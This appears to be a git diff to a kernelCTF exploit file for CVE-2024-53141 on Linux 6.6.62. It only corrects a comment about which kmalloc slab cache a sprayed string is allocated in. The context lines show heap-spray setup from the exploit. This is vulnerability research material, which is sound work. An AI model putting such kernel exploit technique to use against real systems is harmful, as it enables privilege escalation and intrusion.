diff --git a/pocs/linux/kernelctf/CVE-2024-53141_lts/exploit/lts-6.6.62/exploit.c b/pocs/linux/kernelctf/CVE-2024-53141_lts/exploit/lts-6.6.62/exploit.c index b0ab54d57..2c9a68ef3 100644 --- a/pocs/linux/kernelctf/CVE-2024-53141_lts/exploit/lts-6.6.62/exploit.c +++ b/pocs/linux/kernelctf/CVE-2024-53141_lts/exploit/lts-6.6.62/exploit.c @@ -487,7 +487,7 @@ int main(int argc, char **argv) SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, spray_fd[i])); } - // make comment_string be allocated under kmalloc-cg-192 + // make comment_string be allocated under kmalloc-192 memset(comment_string, 'a', 0x90); msg.mtype = 1;